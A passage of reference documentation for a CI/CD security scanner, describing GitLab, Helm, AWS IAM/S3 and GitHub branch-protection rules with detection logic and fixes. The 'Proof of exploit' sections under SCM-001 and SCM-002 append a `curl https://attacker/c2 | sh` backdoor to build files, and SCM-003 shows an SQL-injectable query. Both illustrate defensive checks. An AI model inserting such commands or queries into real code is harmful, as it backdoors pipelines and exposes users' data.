How this is detected. Cross-project and remote includes can be silently re-pointed. Branch-name refs (main/master/develop/head) are treated as unpinned; tag and SHA refs are considered safe.
Recommendation. Pin include: project: entries with ref: set to a tag or commit SHA. Avoid include: remote: for untrusted URLs; mirror the content into a trusted project and pin it.
Source: GL-005 in the GitLab CI provider.
GL-006: Artifacts not signed MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Unsigned artifacts can't be verified downstream, so a tampered build is indistinguishable from a legitimate one. Passes when any of cosign / sigstore / slsa-* / notation-sign appears in the pipeline text.
Recommendation. Add a job that runs cosign sign (keyless OIDC with GitLab's id_tokens works out of the box) or notation sign. Publish the signature next to the artifact and verify it on consume.
Source: GL-006 in the GitLab CI provider.
GL-007: SBOM not produced MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Without an SBOM, downstream consumers can't audit the dependency set shipped in the artifact. Passes when CycloneDX / syft / anchore / spdx-sbom-generator / sbom-tool / Trivy-SBOM appears in the pipeline body.
Recommendation. Add an SBOM step: syft . -o cyclonedx-json, Trivy with --format cyclonedx, or GitLab's built-in CycloneDX dependency-scanning template. Attach the SBOM as a pipeline artifact.
Source: GL-007 in the GitLab CI provider.
HELM-001: Chart.yaml declares legacy apiVersion: v1 MEDIUM 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. apiVersion lives at the top of Chart.yaml. v1 is Helm 2's format and uses a sibling requirements.yaml for dependencies; v2 is Helm 3's format and inlines them in Chart.yaml alongside a Chart.lock for digest pinning. Without v2 there is no in-tree dependency manifest to lock, which is why HELM-002 only fires on v2 charts.
Recommendation. Bump Chart.yaml to apiVersion: v2 and migrate any sibling requirements.yaml entries into the dependencies: list inside Chart.yaml. Run helm dependency update to regenerate Chart.lock so HELM-002's per-dependency digest check has something to read. Helm 3 has been the default shipping channel since November 2019; the v1 format is kept for read-compat but blocks lockfile-based supply-chain controls.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: HELM-001 in the Helm provider.
HELM-002: Chart.lock missing per-dependency digests HIGH 🔧 fix
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified, 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Three failure shapes:
- Chart.yaml declares dependencies but no Chart.lock exists at all.
- Chart.lock exists but its dependencies: list is missing entries declared in Chart.yaml (drift after an edit without re-running helm dependency update).
- Chart.lock lists every dependency but one or more entries lack a digest: field (lock generated by an old Helm 3 version that didn't always populate it).
v1 charts (HELM-001) are skipped. They predate Chart.lock and use requirements.lock against a sibling requirements.yaml. Fix HELM-001 first.
Recommendation. After every change to dependencies: in Chart.yaml, re-run helm dependency update and commit the regenerated Chart.lock. The lock records the resolved version and a sha256:... digest that helm dependency build verifies on download; without it, a compromised chart repo can swap the tarball under the same version and helm install will happily use the substitute.
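The three failure shapes can be sketched as one comparison pass over the two dependency lists. The function name and return shape are illustrative, not the tool's implementation:

```python
def lock_findings(chart_deps, lock_deps):
    """Report the three failure shapes as human-readable strings.

    chart_deps: dependency names declared in Chart.yaml.
    lock_deps:  None when Chart.lock is absent, else a list of
                {"name": ..., "digest": ...} entries from the lock.
    """
    if not chart_deps:
        return []  # no dependencies: nothing to lock
    if lock_deps is None:
        return ["Chart.lock missing"]
    findings = []
    locked = {d["name"] for d in lock_deps}
    for name in chart_deps:
        if name not in locked:
            findings.append(f"{name}: not in Chart.lock (drift)")
    for d in lock_deps:
        if not d.get("digest"):
            findings.append(f"{d['name']}: entry lacks digest")
    return findings
```

The empty-deps early return is the documented false-positive carve-out: charts with no dependencies: key pass automatically.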
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Charts with no dependencies (the dependencies: key is absent or empty) pass automatically. There is nothing to lock.
Source: HELM-002 in the Helm provider.
HELM-003: Chart dependency declared on a non-HTTPS repository HIGH 🔧 fix
Evidences: 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Walks Chart.yaml dependencies: (v2 charts only) and inspects each entry's repository: URL. Accepted schemes:
- https://, chart-museum / OSS chart repos. The default for public Helm charts.
- oci://, registry-hosted charts. TLS is enforced by the registry, not the URL scheme; we still accept this shape because Helm 3.8+ pulls OCI charts over HTTPS unless explicitly configured otherwise.
- file://, in-repo dependency. No network surface.
- @alias, local alias for a previously registered helm repo add URL. The scheme of the original URL is the user's responsibility (and is captured in the chart consumer's ~/.config/helm/repositories.yaml).
Recommendation. Switch each dependencies[].repository value to an https:// chart repo URL, an oci:// registry reference, or a file:// path for in-repo charts. Plaintext http:// (and other non-TLS schemes like git://) lets any on-path attacker substitute the dependency tarball during helm dependency build; Chart.lock's digest check (HELM-002) only catches that on the next update, not the compromised pull itself.
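The scheme gate is a short allowlist check. A minimal sketch; the function name is illustrative:

```python
from urllib.parse import urlsplit

ACCEPTED_SCHEMES = {"https", "oci", "file"}

def repository_url_ok(repository: str) -> bool:
    """Accept https:// / oci:// / file:// plus the @alias shorthand; reject
    plaintext schemes such as http:// and git://."""
    if repository.startswith("@"):
        # Alias into the consumer's repositories.yaml; the original URL's
        # scheme is resolved (and owned) there, not in Chart.yaml.
        return True
    return urlsplit(repository).scheme in ACCEPTED_SCHEMES
```

Note that anything not on the allowlist fails, so exotic plaintext schemes are rejected by default rather than needing their own denylist entry.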
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: HELM-003 in the Helm provider.
HELM-004: Chart dependency version is a range, not an exact pin MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. An exact pin is a string that contains only digits, dots, and at most a single leading v / trailing pre-release or build identifier (1.2.3, v1.2.3, 1.2.3-rc1, 1.2.3+build.5). Anything carrying ^ / ~ / > / < / * / x / X / || / a space (>=4 <5) is treated as a range. The bias is toward false positives: a chart maintainer can suppress per-rule via --ignore-file if they specifically want range semantics, but the default for production charts is a pin.
Recommendation. Replace each dependencies[].version constraint with the exact resolved version from Chart.lock. 17.0.0 instead of ^17.0.0, v1.2.3 instead of ~1.2. Range syntax (^, ~, >=, *, x) lets helm dependency update move every consumer of the chart to a newer dep on the next refresh, even when the lock file looked stable.
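The pin-or-range classification can be approximated like this. A hedged sketch biased the same way the rule is (toward flagging anything range-shaped); the regex is illustrative:

```python
import re

# v-prefixed dotted numerics with an optional -pre or +build suffix
EXACT_PIN = re.compile(r"^v?\d+(\.\d+)*([\-+][\w.]+)?$")
RANGE_MARKERS = ("^", "~", ">", "<", "*", "x", "X", "||", " ")

def is_exact_pin(version: str) -> bool:
    """True for 1.2.3 / v1.2.3 / 1.2.3-rc1 / 1.2.3+build.5; False for
    anything carrying a range marker."""
    if any(m in version for m in RANGE_MARKERS):
        return False
    return bool(EXACT_PIN.match(version))
```

The marker scan runs first, so a constraint like `>=4 <5` fails on the space alone without the regex ever being consulted.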
Source: HELM-004 in the Helm provider.
HELM-005: Chart maintainers field empty or missing chain-of-custody info LOW
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. A maintainers: entry is considered usable when the value is a YAML mapping with name: set to a non-empty string and at least one of email: / url: populated. Entries that look like - name: TODO or carry blank contact fields fail the rule the same way a missing block does: the field exists but doesn't carry a real chain-of-custody signal.
Recommendation. Populate maintainers: in Chart.yaml with at least one entry carrying a name plus either an email or a url. The name is the human a downstream consumer files an issue against; the contact field is the channel they reach. Charts published to ArtifactHub or an internal registry without this field are silently anonymous, fine for a personal scratch chart, not for one your CI pipeline will deploy to production.
Known false positives.
- Library charts (Chart.yaml type: library) often ship without maintainers when distributed inside a single team's monorepo where the org-level CODEOWNERS already names the contact. Suppress with --ignore-file when this matches your situation.
Source: HELM-005 in the Helm provider.
HELM-006: Chart.yaml does not declare a kubeVersion compatibility range LOW
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. Reads kubeVersion: from Chart.yaml; the field is a string carrying a Helm-flavoured SemVer range. Empty / missing fails the rule. Whitespace-only values fail too: an obviously-blank key should not satisfy a posture check.
Recommendation. Add a kubeVersion: SemVer range to Chart.yaml covering the Kubernetes versions you've actually rendered and tested the chart against. >= 1.25.0 < 1.32.0 is the common shape for a chart maintained against the upstream support window. Helm will refuse helm install against a cluster whose Kubernetes version falls outside the range, catching silent-breakage surprises (removed apiVersions, renamed RBAC verbs, alpha features) at pre-flight rather than at runtime.
Known false positives.
- Library charts (Chart.yaml type: library) that wrap version-agnostic helpers often legitimately ship without kubeVersion. Suppress with --ignore-file when the chart genuinely targets every supported Kubernetes minor.
Source: HELM-006 in the Helm provider.
HELM-007: Chart.yaml description field is empty or missing LOW
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Walks Chart.yaml description: and fires when the field is missing, None, or a string that's empty after stripping whitespace. The Helm chart spec doesn't enforce the field but every chart published to ArtifactHub or the upstream stable repo populates it; production charts that ship without it are usually a copy-paste-from-template oversight.
Recommendation. Set description: in Chart.yaml to a one-sentence summary of what the chart deploys (e.g. description: Postgres 14 cluster with WAL-G backups and a Prometheus exporter). Helm registries display this string in chart listings; without it, anyone browsing has to read the README to figure out what the chart does.
Source: HELM-007 in the Helm provider.
HELM-008: Chart.lock generated more than 90 days ago MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Reads Chart.lock's top-level generated: timestamp (an ISO-8601 string Helm writes when the lock was last regenerated) and compares against now. Fires when the delta is more than 90 days. Charts without Chart.lock are skipped, as are charts whose generated: field is malformed or absent; HELM-002 covers the missing-lock case from a different angle.
Recommendation. Run helm dependency update against every dependency-carrying chart at least once per release cycle, and commit the regenerated Chart.lock. The lock pins versions and digests; the update cadence is what brings in CVE fixes and deprecation notices from the last quarter. CI can run the same command against main weekly to surface drift as a PR rather than letting the lock sit stale until the next release.
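The staleness gate mirrors the freshness gates elsewhere in this guide, just inverted: it fires on old, not young. A minimal sketch with the malformed-value pass-through the rule describes; names are illustrative:

```python
from datetime import datetime, timezone

MAX_LOCK_AGE_DAYS = 90

def lock_is_stale(generated, now: datetime) -> bool:
    """Compare Chart.lock's generated: timestamp against now. Malformed or
    absent values pass silently, mirroring the rule text."""
    try:
        ts = datetime.fromisoformat(generated.replace("Z", "+00:00"))
    except (AttributeError, ValueError):
        return False  # unparseable or missing: no finding from this rule
    return (now - ts).days > MAX_LOCK_AGE_DAYS
```

A weekly CI job running helm dependency update against main keeps this predicate False without anyone thinking about it.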
Known false positives.
- A chart that pins exact versions and never needs new dependencies (e.g. a chart packaging a single internal library that itself updates rarely) may legitimately have a stale Chart.lock. Suppress with --ignore-file when this matches your situation.
Source: HELM-008 in the Helm provider.
HELM-009: Chart home / sources URL uses a non-HTTPS scheme LOW
Evidences: 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Walks Chart.yaml home: (single string) and sources: (list of strings). Fires on any value whose scheme is http://, ftp://, or other plaintext form. Empty / missing fields pass, the rule only evaluates URLs that are populated with the wrong scheme. HELM-003 covers the same risk for dependency-repo URLs.
Recommendation. Switch every home: URL and every entry in sources: to https://. Most chart-listing UIs display these as click-through links from a public chart registry; serving them over plaintext is a confused-deputy footgun for anyone evaluating the chart's provenance. http:// URLs against localhost are not exempted; production charts shouldn't ship references to a developer-local endpoint anyway.
Source: HELM-009 in the Helm provider.
HELM-010: Chart.yaml appVersion field is empty or missing LOW
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Library charts (Chart.yaml type: library) legitimately don't have an appVersion because they package no application. Those are exempted. For application charts (type: application, the default), appVersion is required for CVE tracking and release-tracking; without it, helm list shows - in the AppVersion column and downstream consumers have no signal.
Recommendation. Set appVersion: in Chart.yaml to the version of the application the chart packages (e.g. appVersion: "17.2" for a Postgres-17.2 chart at version: 1.4.2). When the upstream application releases, bump appVersion and re-cut the chart. Helm's CLI displays appVersion alongside the chart version in helm list, so downstream operators can see which app version is running where.
Source: HELM-010 in the Helm provider.
IAM-001: CI/CD role has AdministratorAccess policy attached CRITICAL
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. A CI/CD service role with AdministratorAccess attached turns any pipeline compromise into account compromise. The classic anti-pattern: the role started narrow, the pipeline grew, someone attached AdministratorAccess to unblock a deploy, and it never came off.
Recommendation. Replace AdministratorAccess with least-privilege policies.
Source: IAM-001 in the AWS provider.
IAM-002: CI/CD role has wildcard Action in attached policy HIGH
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Action: '*' (or service-prefix wildcards like s3:*) on an attached policy is functionally equivalent to AdministratorAccess for that resource. The wildcard absorbs every new IAM action AWS adds, so the role's authority grows without any local change.
Recommendation. Replace wildcard actions with specific IAM actions.
Source: IAM-002 in the AWS provider.
IAM-003: CI/CD role has no permission boundary MEDIUM
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. A permissions boundary is the maximum-permission ceiling for a role. Without one, every future PR that attaches another inline / managed policy raises the role's effective authority indefinitely. With a boundary in place, the policy churn happens beneath a fixed cap that your security team owns separately.
Recommendation. Attach a permissions boundary defining max permissions.
Source: IAM-003 in the AWS provider.
IAM-004: CI/CD role can PassRole to any role HIGH
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. iam:PassRole with Resource: '*' lets the principal hand any role to any service. Combined with a service that runs your code (Lambda, ECS, CodeBuild, EC2 Instance Profiles), this is role-hop privilege escalation: launch an ephemeral resource configured with a higher-privileged role, run code under that identity, exfil. Scoping by ARN + iam:PassedToService removes the escalation path.
Recommendation. Restrict iam:PassRole to specific role ARNs and add an iam:PassedToService condition.
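The remediated statement has a fixed shape: one ARN in Resource, one service in the condition. A hedged sketch expressed as a Python dict (ready for json.dumps into a policy document); the account ID, role name, and service are placeholders, not values from this guide:

```python
# Placeholder ARN/account/service values; the statement shape follows the
# recommendation above.
scoped_pass_role = {
    "Effect": "Allow",
    "Action": "iam:PassRole",
    # Scoped to one role ARN instead of Resource: "*"
    "Resource": "arn:aws:iam::123456789012:role/ci-lambda-exec",
    # And to one service, closing the role-hop path through any other
    # code-running service (ECS, CodeBuild, EC2 instance profiles, ...)
    "Condition": {
        "StringEquals": {"iam:PassedToService": "lambda.amazonaws.com"}
    },
}
```

Both constraints matter: the ARN stops the principal passing a higher-privileged role, and iam:PassedToService stops the permitted role being handed to an unexpected service.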
Source: IAM-004 in the AWS provider.
IAM-005: CI/CD role trust policy missing sts:ExternalId HIGH
Evidences: 1.3.4 Ensure organization identity is required for contribution (no long-lived personal tokens), 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. A trust policy that lets an external AWS account assume the role without an sts:ExternalId condition is vulnerable to the confused-deputy pattern: a third-party SaaS configured with your role ARN can also be used by another customer of that SaaS to assume your role (if they know the ARN). sts:ExternalId ties the role to a specific tenancy.
Recommendation. Add a Condition requiring sts:ExternalId for external principals.
Source: IAM-005 in the AWS provider.
IAM-006: Sensitive actions granted with wildcard Resource MEDIUM
Evidences: 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. IAM-002 catches Action: "*". IAM-006 catches the more common "scoped action, unscoped resource" pattern on sensitive services (S3/KMS/SecretsManager/SSM/IAM/STS/DynamoDB/Lambda/EC2).
Recommendation. Scope the Resource element to specific ARNs (buckets, keys, secrets, roles).
Source: IAM-006 in the AWS provider.
PBAC-001: CodeBuild project has no VPC configuration HIGH
Evidences: 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. A CodeBuild project with no VPC configuration runs in AWS-managed network space: egress to the public internet is unrestricted, and every package registry / CDN / arbitrary endpoint is reachable. Inside a VPC, security-group + VPC-endpoint policies become the egress gate, which is the only practical way to limit a compromised build's exfiltration paths.
Recommendation. Configure the CodeBuild project to run inside a VPC with appropriate subnets and security groups. Use a NAT gateway or VPC endpoints to control outbound internet access and restrict build nodes to only the network resources they require.
Source: PBAC-001 in the AWS provider.
PBAC-002: CodeBuild service role shared across multiple projects MEDIUM
Evidences: 2.2.2 Ensure build workers are single-use, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. One CodeBuild service role across many projects means a compromise of any project's build environment grants access to whatever resources every other project's build needs. Per-project roles cap the radius: a backdoor in the foo-tests build can't reach the deploy-prod build's secrets if they each have their own role.
Recommendation. Create a dedicated IAM service role for each CodeBuild project, scoped to only the permissions that specific project requires. This limits the blast radius if one project's build is compromised.
Source: PBAC-002 in the AWS provider.
S3-001: Artifact bucket public access block not fully enabled CRITICAL
Evidences: 4.2.1 Ensure access to artifacts is limited.
How this is detected. S3 Block Public Access is the bucket-level circuit breaker that supersedes any future ACL or bucket-policy edit. Without all four settings enabled, a misconfigured CloudFormation change or a stray aws s3api call can re-expose the bucket to the public, even if the bucket had previously been private.
Recommendation. Enable all four S3 Block Public Access settings on the artifact bucket: BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, and RestrictPublicBuckets.
Source: S3-001 in the AWS provider.
S3-002: Artifact bucket server-side encryption not configured HIGH
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Default bucket encryption applies SSE-S3 (AES256) to every PutObject. As of January 2023, AWS enables this on all new buckets automatically, but existing buckets created before then can still be unencrypted unless explicitly configured. Without it, individual objects can be uploaded without encryption (the client gets to choose).
Recommendation. Enable default bucket encryption using at minimum AES256 (SSE-S3). For stronger key control, use SSE-KMS with a customer-managed key.
Source: S3-002 in the AWS provider.
S3-003: Artifact bucket versioning not enabled MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked), 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Versioning makes overwrites and deletes recoverable: the previous content of an object survives until lifecycle expires it. Without versioning, an artifact overwrite (a bad pipeline run, a malicious replacement, a typo'd aws s3 cp) is unrecoverable; the original bytes are gone.
Recommendation. Enable S3 versioning on the artifact bucket so that previous artifact versions are retained and rollback is possible. Combine with a lifecycle rule to expire old versions after a retention period.
Source: S3-003 in the AWS provider.
S3-004: Artifact bucket access logging not enabled LOW
Evidences: 2.3.7 Ensure pipeline steps produce audit logs, 5.2.3 Ensure deployment environment activity is audited.
How this is detected. S3 server access logging records every API operation against the bucket: who, when, what object, what method. CloudTrail data events overlap but cost more; access logs are the cheap baseline. Without them, an exfiltration via GetObject doesn't leave a trail you can investigate.
Recommendation. Enable S3 server access logging for the artifact bucket and direct logs to a separate, centralized logging bucket with restricted write access.
Source: S3-004 in the AWS provider.
S3-005: Artifact bucket missing aws:SecureTransport deny MEDIUM
Evidences: 4.2.1 Ensure access to artifacts is limited.
How this is detected. S3 endpoints accept HTTP and HTTPS by default. Without an explicit Deny on aws:SecureTransport=false, a plaintext request, typically from a misconfigured client or an SDK with a stale endpoint, is honored if signed. The bucket policy Deny is the only enforcement; no account-level switch covers it.
Recommendation. Add a Deny statement for s3:* with Bool aws:SecureTransport=false.
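The Deny statement has a standard shape. A hedged sketch as a Python dict (the bucket name is a placeholder); note it must cover both the bucket ARN and the object ARN, since bucket-level and object-level actions match different Resource forms:

```python
# "artifact-bucket" is a placeholder name; the statement shape follows the
# recommendation above.
deny_insecure_transport = {
    "Sid": "DenyInsecureTransport",
    "Effect": "Deny",
    "Principal": "*",
    "Action": "s3:*",
    "Resource": [
        "arn:aws:s3:::artifact-bucket",    # bucket-level actions (ListBucket)
        "arn:aws:s3:::artifact-bucket/*",  # object-level actions (GetObject)
    ],
    "Condition": {"Bool": {"aws:SecureTransport": "false"}},
}
```

Because an explicit Deny beats any Allow in IAM evaluation, this single statement closes plaintext access regardless of what other policies grant.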
Source: S3-005 in the AWS provider.
SCM-001: Default branch has no protection rule HIGH
Evidences: 1.1.17 Ensure default branches' commits are protected from being deleted/rewritten.
How this is detected. Without a branch protection rule on the default branch, anyone with write access can force-push, delete the branch, or merge directly without review. Even when CI runs on the branch, an unprotected default branch lets a single compromised maintainer rewrite history and erase the audit trail. The check is sourced from the GitHub REST API (GET /repos/{owner}/{repo}/branches/{branch}/protection); a 404 response is itself the failure signal.
Recommendation. Add a branch protection rule on the default branch in the repository's Settings -> Branches. At minimum require pull request reviews before merging, require status checks to pass, and disable force-pushes / deletions. Match the rule to OpenSSF Scorecard's Branch-Protection thresholds for the organization's compliance baseline.
Seen in the wild.
- Numerous post-incident reports (PyPI / RubyGems package compromises 2018-2024) trace the initial maintainer-account takeover step to the absence of branch protection: the attacker pushed a single tampered commit to the default branch, the release pipeline ran on push, the malicious build shipped to the registry within minutes, and recovery required force-pushing the audit trail itself. Branch protection turns the entire class of attack into a review-then-merge gate.
Proof of exploit.
With no protection rule on main, a single compromised
maintainer credential is enough to ship a tampered build:
git checkout main
echo 'curl https://attacker/c2 | sh' >> Makefile
git commit -am 'fix: tweak'
git push origin main # no review required
# CI now runs the tampered build with full secret access.
Recovery needs force-push to rewrite the trail:
git push --force origin main # also unprotected
A protection rule with required_pull_request_reviews set
and allow_force_pushes: false blocks both the push and
the rewrite without giving up an inch of velocity.
Source: SCM-001 in the SCM provider.
SCM-002: Default branch protection does not require pull request reviews HIGH
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators.
How this is detected. Reads required_pull_request_reviews.required_approving_review_count from the branch protection payload. Fires when the field is absent (no review requirement at all) or when the count is 0. SCM-001 covers the case where no protection rule exists; this rule scopes specifically to the review-count knob inside an existing rule.
Recommendation. In the default-branch protection rule, enable Require a pull request before merging and set the minimum approving review count to at least 1 (Scorecard's threshold for Branch-Protection's middle tier; raise to 2 for higher trust). Combine with Dismiss stale pull request approvals when new commits are pushed so a force-push doesn't carry an old approval forward.
Known false positives.
- required_pull_request_reviews.bypass_pull_request_allowances is covered by SCM-018: a protection rule that requires reviews but lists every contributor in the bypass allowlist still passes this rule even though the control is unenforced in practice. Read SCM-002 + SCM-018 as a pair when auditing whether required review actually fires.
Proof of exploit.
With protection but no required reviews, a maintainer can
self-approve a tampered change in two clicks:
git checkout -b release-fix
echo 'curl https://attacker/c2 | sh' >> deploy.sh
git commit -am 'fix: handle edge case'
git push origin release-fix
gh pr create --fill
gh pr merge --squash --auto # no second-set-of-eyes
# Release pipeline runs the tampered build with full
# production secrets in scope.
Setting required_approving_review_count to >= 1 forces
a separate identity to acknowledge the change before merge.
Source: SCM-002 in the SCM provider.
SCM-003: GitHub default code scanning is not enabled MEDIUM
Evidences: 1.1.7 Ensure any change to code is automatically scanned for risks (SAST).
How this is detected. Reads state from the default code-scanning setup endpoint (GET /repos/{owner}/{repo}/code-scanning/default-setup). Fires when state is anything other than configured (not-configured, missing, or 404). This check only evaluates the default-setup endpoint. Repos running hand-authored CodeQL workflows or third-party SARIF uploads can still fail SCM-003; suppress per repo via ignore-file when that alternative coverage is intentional.
Recommendation. Enable default code scanning under the repository's Settings -> Code security -> Code scanning -> Default. The GitHub-managed CodeQL setup picks the right languages automatically and writes findings into the Code Scanning UI on every push and PR. Teams that already ship a CodeQL workflow can leave this rule's check off — but the default setup is the lowest-friction path for repos that don't have one.
Known false positives.
- Repos that ship a hand-authored CodeQL workflow (or use Semgrep / Snyk / another SAST whose results land in the Code Scanning UI via SARIF upload) get the same coverage without enabling default setup. Suppress via ignore-file rather than removing the rule.
Proof of exploit.
Without code scanning, the only signal that a PR
introduces (e.g.) a SQL injection or hardcoded secret
comes from the human reviewer:
- def lookup(user_id):
- return db.query("SELECT * FROM u WHERE id = ?", user_id)
+ def lookup(user_id):
+ return db.query(f"SELECT * FROM u WHERE id = {user_id}")
A reviewer skimming a 400-line PR misses this. Default
CodeQL setup catches the same change as a CWE-89 finding
in the PR check, surfaces it inline in the diff, and
blocks the merge if the protection rule wires it up as
a required status check (see SCM-008).
Source: SCM-003 in the SCM provider.
SCM-004: GitHub secret scanning is not enabled HIGH
Evidences: 1.5.1 Ensure scanners are in place to identify and prevent sensitive data in code.
How this is detected. Reads security_and_analysis.secret_scanning.status from the repo metadata payload. Fires when the value is anything other than enabled. Secret scanning has been free for public repos since 2023; private repos require a GitHub Advanced Security license. Without secret scanning, a credential committed even briefly is recoverable from git history indefinitely.
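A minimal sketch of this read, including the token-scope ambiguity noted under Known false positives: when the security_and_analysis block is omitted entirely, "disabled" and "unknown" collapse into the same firing condition. Names are illustrative, not the scanner's code.

```python
# Illustrative tri-state for the SCM-004 field read described above.
def secret_scanning_state(repo: dict) -> str:
    block = repo.get("security_and_analysis")
    if block is None:
        # Block omitted from the API response: the token likely lacks
        # admin scope, so disabled vs. unknown cannot be distinguished.
        return "unknown"
    status = block.get("secret_scanning", {}).get("status")
    return "enabled" if status == "enabled" else "disabled"

def scm_004_fires(repo: dict) -> bool:
    # Fires on anything other than an explicit "enabled".
    return secret_scanning_state(repo) != "enabled"
```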
Recommendation. Enable secret scanning under the repository's Settings -> Code security -> Secret scanning. The GitHub-managed scanner covers ~200 token patterns from major providers and runs on every push. Pair with push protection so secrets are blocked at commit time rather than caught after the fact.
Known false positives.
- When the scanning token lacks admin scope on the repo, the security_and_analysis block is omitted from the API response and this rule cannot tell disabled from unknown. The fix is to grant the token admin scope on the repo (or re-run with a personal token from a maintainer) rather than to suppress the rule.
Seen in the wild.
- GitGuardian's annual State of Secrets Sprawl reports find millions of fresh credential leaks per year across public GitHub commits, with the median time-to-revocation measured in days. Native secret scanning alerts the maintainer within minutes of the push, collapsing the exploitable window from days to minutes for the patterns it covers.
Source: SCM-004 in the SCM provider.
SCM-005: Dependabot security updates are not enabled MEDIUM
Evidences: 1.1.8 Ensure scanners are in place to identify and confirm presence of vulnerabilities (SCA).
How this is detected. Reads security_and_analysis.dependabot_security_updates.status from the repo metadata payload. Fires when the value is anything other than enabled. Without security updates, the team has to discover and triage CVEs against their dependency graph manually — a delay measured in days or weeks even on attentive teams, vs hours when the bot opens the PR for them.
Recommendation. Enable Dependabot security updates under the repository's Settings -> Code security -> Dependabot. The bot opens a PR with the minimum-required upgrade for each open advisory against an in-use dependency. Pair with version-update config (.github/dependabot.yml) so routine bumps don't rely on the security-update path.
Known false positives.
- When the scanning token lacks admin scope on the repo, the security_and_analysis block is omitted from the API response and this rule cannot tell disabled from unknown. Re-run with admin scope to confirm.
- Repos that delegate dependency-update PRs to Renovate, Snyk, or another bot get equivalent coverage without Dependabot. Suppress via ignore-file rather than removing the rule.
Source: SCM-005 in the SCM provider.
SCM-006: Default branch protection does not require signed commits MEDIUM
Evidences: 1.1.6 Ensure any change to code is signed.
How this is detected. Reads required_signatures.enabled from the branch protection payload. Fires when the field is missing or False. Required signatures don't validate signature authenticity (the GitHub web UI does that lazily on render), but an unsigned commit is rejected at push time, which blocks the most common compromise pattern: a stolen personal access token used to push under the maintainer's name without access to their signing key.
Recommendation. In the default-branch protection rule, enable Require signed commits. Configure GPG, SSH, or S/MIME signatures for every contributor's git client (git config commit.gpgsign true plus an uploaded public key). Pair with branch protection's Restrict who can push to matching branches so only signed commits from authorized identities land on the default branch.
Source: SCM-006 in the SCM provider.
SCM-007: Default branch protection allows force-pushes HIGH
Evidences: 1.1.17 Ensure default branches' commits are protected from being deleted/rewritten.
How this is detected. Reads allow_force_pushes.enabled from the branch protection payload. Fires when the value is True. The complementary deletion-protection knob is covered by SCM-009; this rule focuses on the rewrite-history attack class because force-push is the primitive every post-incident rewrite uses to clean up after itself.
Recommendation. In the default-branch protection rule, set Allow force pushes to Disabled. Force-pushes overwrite the audit trail; an attacker who lands a malicious commit can erase evidence of it after the fact. Also set Allow deletions to Disabled so the branch itself can't be wiped.
Source: SCM-007 in the SCM provider.
SCM-008: Default branch protection does not require status checks MEDIUM
Evidences: 1.1.5 Ensure any change to code requires the review of additional strong authenticators, 1.1.7 Ensure any change to code is automatically scanned for risks (SAST).
How this is detected. Reads required_status_checks.contexts (or the newer checks shape) from the branch protection payload. Fires when the field is missing or the contexts list is empty. Without required checks the merge gate degrades to human-only review; SCM-002 covers the review knob, this rule covers the automated-verification knob, and both should be on for high-trust default branches.
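The two payload shapes mentioned above (the legacy contexts string list and the newer checks objects) can be normalized as in this sketch. Illustrative only; the provider's actual normalization may differ.

```python
# Illustrative sketch of the SCM-008 firing condition: fires when no
# status-check requirement exists or the effective context list is empty.
def scm_008_fires(protection: dict) -> bool:
    rsc = protection.get("required_status_checks")
    if rsc is None:
        return True  # no status-check requirement at all
    # Legacy shape: a flat list of context name strings.
    contexts = list(rsc.get("contexts") or [])
    # Newer shape: objects like {"context": "ci/build", "app_id": 123}.
    contexts += [c["context"] for c in (rsc.get("checks") or []) if c.get("context")]
    return not contexts
```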
Recommendation. In the default-branch protection rule, enable Require status checks to pass before merging and list every check the team relies on (CI build, code scanning, secret scanning, lint). Set strict: true (Require branches to be up to date before merging) so a stale base doesn't land regressions the latest checks would catch.
Known false positives.
- The restrictions block (users / teams / apps allowed to push directly to the protected branch) is not consulted today: a rule that requires status checks but lists every contributor in the push-restrictions allowlist still passes this rule even though those identities can land code without the checks running. Audit the allowlist in the GitHub UI when this rule passes on a high-trust repo.
- Status-check names are matched as opaque strings; a configured required check that no workflow actually emits (typo, deleted job) will still pass this rule. The check would block the merge in practice (GitHub waits for the named context forever), but the misconfiguration itself isn't visible from the protection payload.
Source: SCM-008 in the SCM provider.
SCM-009: Default branch protection allows branch deletion HIGH
Evidences: 1.1.17 Ensure default branches' commits are protected from being deleted/rewritten.
